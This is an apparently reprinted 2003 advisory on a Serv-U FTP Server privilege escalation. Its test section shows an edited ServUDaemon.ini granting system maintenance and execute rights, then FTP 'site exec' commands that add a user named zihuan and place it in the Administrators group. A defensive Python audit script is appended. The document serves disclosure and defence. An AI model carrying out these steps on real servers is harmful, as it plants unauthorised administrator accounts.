Creation time: 2003-12-16
Article attribute: original
Article submission:
Zhaoyuan (zhaoyuan8881980_at_163.com)
Release date: December 1, 2003 (first published in "hacker x file")
Author: Zhao original (Purple Magic)
Email: _zihuan@163.com
Local privilege escalation: Yes
Remote privilege escalation: Yes
Prerequisites: Permission to change the Serv-U configuration file
Disclaimer: This is just an idea and a method for escalating privileges.
First, affected software
Serv-U FTP Server 4.1.0.9 (and all previous versions)
Second, the affected system
Microsoft Windows Server 2003 All versions
Microsoft Windows XP All versions
Microsoft Windows 2000 All versions
Microsoft Windows NT All versions
Third, overview
Serv-U FTP Server is FTP server software produced by Rhinosoft, which is currently widely used in the world. After study, I found that the configuration of the Serv-U FTP Server is stored in the ServUDaemon.ini file in the Serv-U FTP Server file directory. If a local restricted user or an attacker with normal permissions can access the file and carefully construct the content of the ServUDaemon.ini file, they can use the FTP process to execute any command on the system with system permission.
Fourth, defect analysis:
After a user is set up, Serv-U FTP Server stores the configuration information in the ServUDaemon.ini file. This includes user permission information and accessible directory information. If a local restricted user or a remote attacker can read and write the file directory of the Serv-U FTP Server, then by modifying the ServUDaemon.ini file in that directory they can execute any command on the remote or local system through the FTP process, with FTP system administrator privileges. This is not affected by the system version. (Installations where the user information option "store in the system registry" is selected are not affected by this defect.)
Fifth, test method:
1. Local test
Suppose a local restricted user can browse the file directory of the Serv-U FTP Server and find the ServUDaemon.ini file. Opened with Notepad, the original file is:
[Global]
Version = 4.1.0.0 // Serv-U FTP Server version number
Processid = 584
RegistrationKey = UEYZ459WABR4LVRKIKH4DYW9F8V4J / AHLVPOK8TQOKYZ4D3WBYMIL1VKKJGDAELPDKSWM5DOXJSGW64YYYPDO WAGNUBUYCB
[Domains]
Domain1 = 127.0.0.1||21|127.0.0.1|1|0 // host IP, domain name and port
[Domain1]
User1 = zihuan|1|0
[User = zihuan|1]
Password = RFE8DFBE3F7EC27FB043D4305A04E6D2C6
Homedir = C:\ // directory that can be browsed
TIMEOUT = 600
Access1 = c:\|rwamlcdp
If you modify the ServUDaemon.ini file to:
[Global]
Version = 4.1.0.0
Processid = 584
RegistrationKey = UEYZ459WABR4LVRKIKH4DYW9F8V4J / AHLVPOK8TQOKYZ4D3WBYMIL1VKKJGDAELPDKSWM5DOXJSGW64YYYPDO WAGNUBUYCB
[Domains]
Domain1 = 127.0.0.1||21|127.0.0.1|1|0
[Domain1]
User1 = zihuan|1|0
[User = zihuan|1]
Password = RFE8DFBE3F7EC27FB043D4305A04E6D2C6
Homedir = C:\
TIMEOUT = 600
Maintenance = system // privilege type
Access1 = C:\|rwamelcdp
Compared with the original, the above content has the additional line "Maintenance = system". Save the modification. Then, after logging in to the Serv-U FTP Server with FTP, execute the following commands:
FTP> Open IP
Connected to IP.
220 Serv-U FTP Server V4.1.0.0 for Winsock Ready ...
User (IP:(none)): ID // enter the constructed user
331 USER Name Okay, please send complete e-mail address as password.
Password: password // password
230 User logged in, proceed.
FTP> CD WinNT // enter the Winnt directory on Win2K; on WinXP or Windows Server 2003 this should be the Windows directory
250 Directory Changed to /Winnt
FTP> CD System32 // enter the System32 directory
250 Directory Changed to /Winnt/System32
FTP> Quote Site Exec Net.exe User Zihuan Zihuan /Add // use the system's net.exe file to add a user
200 Exec Command Successful (TID = 33).
FTP> Quote Site Exec Net.exe Localgroup Administrators Zihuan /Add // promote to super user
This adds a super user on the local system with the user name zihuan and the password zihuan. You can also use the quote site exec net.exe localgroup administrators user /add command to add the current user to the super-user group. Of course, any other command can also be executed on the system.
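A defender's check for the change described above, as an added example that is not part of the original article: it scans ServUDaemon.ini text for user sections that carry Maintenance = system or an access rule with the e flag. The function name, the sample file (constructed) and the reading of e as the execute permission, the letter that the modified Access1 line has and the original lacks, are assumptions.

```python
import re

# Constructed sample in the layout of the modified file shown above
# (not taken from a real server).
SAMPLE_INI = r"""
[Domain1]
User1=zihuan|1|0
User2=guest|1|0
[USER=zihuan|1]
HomeDir=c:\
Maintenance=System
Access1=c:\|RWAMELCDP
[USER=guest|1]
HomeDir=d:\pub
Access1=d:\pub|RL
"""

def audit_servu_ini(text):
    """Return (user, finding) pairs for risky per-user settings."""
    findings, user = [], None
    for raw in text.splitlines():
        line = raw.split("//")[0].strip()   # drop article-style // annotations
        section = re.match(r"\[\s*user\s*=\s*([^|\]]+)", line, re.I)
        if section:
            user = section.group(1).strip()  # entering a per-user section
            continue
        if line.startswith("["):
            user = None                      # any other section ends it
            continue
        if user is None or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        if key.lower() == "maintenance" and value.lower() == "system":
            findings.append((user, "Maintenance=System"))
        elif re.fullmatch(r"access\d+", key, re.I):
            # Access rule layout: <path>|<permission letters>
            path, _, flags = value.rpartition("|")
            if "e" in flags.lower():         # assumption: e = execute
                findings.append((user, "execute flag on " + path.strip()))
    return findings

if __name__ == "__main__":
    for name, finding in audit_servu_ini(SAMPLE_INI):
        print(f"{name}: {finding}")
```

Run against a copy of the real file, any finding for an account that was not deliberately given these rights is a sign the file has been edited outside the Serv-U administrator.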
Statement:
This article is only used to describe possible security issues; the author and the hacker X-Archive Magazine do not provide any guarantee or commitment regarding this security announcement. The user is responsible for any direct or indirect consequences and losses caused by the dissemination or use of this article, and the author does not assume any responsibility for them. The author has the right to modify and interpret this security announcement. If you want to reprint or disseminate this article, you must preserve the integrity of this article, including all content of the copyright statement. Modifying or adding to this announcement without the author's permission is not allowed.
If there is a problem, please email: _zihuan@163.com.